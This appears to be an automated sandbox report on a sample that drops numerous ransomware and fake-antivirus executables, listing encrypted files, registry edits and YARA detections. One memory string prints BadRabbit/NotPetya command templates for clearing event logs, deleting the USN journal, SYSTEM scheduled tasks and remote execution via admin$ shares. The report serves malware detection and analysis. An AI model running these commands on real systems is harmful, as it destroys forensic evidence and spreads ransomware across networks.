          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\PC Defender v2.zip entropy: 7.99978696478Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\RegistrySmart.zip entropy: 7.99981103656Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Security Central.zip entropy: 7.9998073022Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Security Defender.zip entropy: 7.99986820903Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Security Defender 2015.zip entropy: 7.99962123959Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\SE2011.zip entropy: 7.99992026328Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\SecurityScanner.zip entropy: 7.99992877603Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\SmartDefragmenter.zip entropy: 7.99953631325Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\VAV2008.zip entropy: 7.99974722497Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@VAV2008.exe entropy: 7.99556481134Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeFile created: C:\Users\user\Downloads\ChromeSetup.exe.deria entropy: 7.99986514211Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeFile created: C:\Users\user\Desktop\07bb0738.exe.deria entropy: 7.99878202232Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeFile created: C:\Users\user\Desktop\Endermanch@Antivirus.exe.deria entropy: 7.99991815725Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeFile created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe.deria entropy: 7.99978902736Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeFile created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe.deria entropy: 7.9997808265Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99443799114Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99443799114Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99443799114Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99443799114Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99443799114Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\AdobeHunspellPlugin.dll.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99998935965Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\en_CA.dic.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99974670907Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\hyph_en_CA.dic.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99940740792Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\en_GB.aff.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99766505229Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99955022606Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe.5539DE8C2FFC01CA0A5975F5CAB0D6B6AAD4C20F8B1E6990C50187DD2E003671 entropy: 7.99786663085Jump to dropped file
          Source: C:\Windows\antivirus-platinum.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Start Page
          Source: C:\Windows\antivirus-platinum.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Window Title

          System Summary

          barindex
          Source: 23.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 47.0.586F.tmp.7ff769b10000.2.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 57.0.Endermanch@InfinityCrypt.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: Detects InfinityLock ransomware Author: ditekSHen
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 22.3.rundll32.exe.ba3008.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 22.3.rundll32.exe.ba3008.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 22.2.rundll32.exe.ba3008.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 22.3.rundll32.exe.ba3008.2.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 23.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 47.0.586F.tmp.7ff769b10000.1.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 22.3.rundll32.exe.ba3008.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 22.2.rundll32.exe.ba3008.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 18.2.Endermanch@BadRabbit.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 18.2.Endermanch@BadRabbit.exe.c4fae0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 23.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 47.0.586F.tmp.7ff769b10000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 22.3.rundll32.exe.ba3008.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 22.2.rundll32.exe.b25460.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 22.2.rundll32.exe.b25460.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 47.2.586F.tmp.7ff769b10000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 23.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 22.2.rundll32.exe.b25460.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 22.2.rundll32.exe.b25460.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 18.2.Endermanch@BadRabbit.exe.c4fae0.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 22.3.rundll32.exe.ba3008.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 22.2.rundll32.exe.4530000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 22.2.rundll32.exe.4530000.2.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 57.0.Endermanch@InfinityCrypt.exe.3531cc.1.unpack, type: UNPACKEDPEMatched rule: Detects InfinityLock ransomware Author: ditekSHen
          Source: 00000017.00000000.387505023.0000000000448000.00000020.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: 00000016.00000003.408744646.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: 00000017.00000000.390806743.0000000000448000.00000020.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: 00000017.00000000.383647145.0000000000448000.00000020.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: 00000017.00000000.392692750.0000000000448000.00000020.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: Process Memory Space: rundll32.exe PID: 4124, type: MEMORYSTRMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: Detects InfinityLock ransomware Author: ditekSHen
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: Cerber3 Author: pekeinfo
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: C:\Users\user\Desktop\Fantom.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Detects Petya Ransomware Author: Florian Roth
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: Endermanch@PolyRansom.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Endermanch@ViraLock.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Endermanch@SE2011.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: rundll32.exe, 00000016.00000002.493753768.000000000453D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\AVPC2009\options
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_00410D7415_2_00410D74
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_0040135715_2_00401357
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_00402CC515_2_00402CC5
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_0040D4FF15_2_0040D4FF
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_00409DE015_2_00409DE0
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_004099A215_2_004099A2
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_00407E0E15_2_00407E0E
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_00409B3615_2_00409B36
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_00410E6917_2_00410E69
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_0040131317_2_00401313
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_00402C8117_2_00402C81
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_0040997B17_2_0040997B
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_00407DE717_2_00407DE7
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_0040D58F17_2_0040D58F
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_00409DB917_2_00409DB9
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_00409B0F17_2_00409B0F
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeSection loaded: avthook.dllJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeSection loaded: 0x1cac30a6.dllJump to behavior
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeSection loaded: quserex.dll
          Source: 07bb0738.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 23.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 47.0.586F.tmp.7ff769b10000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 47.0.586F.tmp.7ff769b10000.2.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 57.0.Endermanch@InfinityCrypt.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 22.3.rundll32.exe.ba3008.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 22.3.rundll32.exe.ba3008.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 22.2.rundll32.exe.ba3008.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 22.3.rundll32.exe.ba3008.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 23.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 47.0.586F.tmp.7ff769b10000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 47.0.586F.tmp.7ff769b10000.1.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 22.3.rundll32.exe.ba3008.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 22.2.rundll32.exe.ba3008.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 18.2.Endermanch@BadRabbit.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 18.2.Endermanch@BadRabbit.exe.c4fae0.0.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 23.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.3.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 47.0.586F.tmp.7ff769b10000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 47.0.586F.tmp.7ff769b10000.0.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 22.3.rundll32.exe.ba3008.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 22.2.rundll32.exe.b25460.0.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 22.2.rundll32.exe.b25460.0.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 47.2.586F.tmp.7ff769b10000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 47.2.586F.tmp.7ff769b10000.0.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 23.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 22.2.rundll32.exe.b25460.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
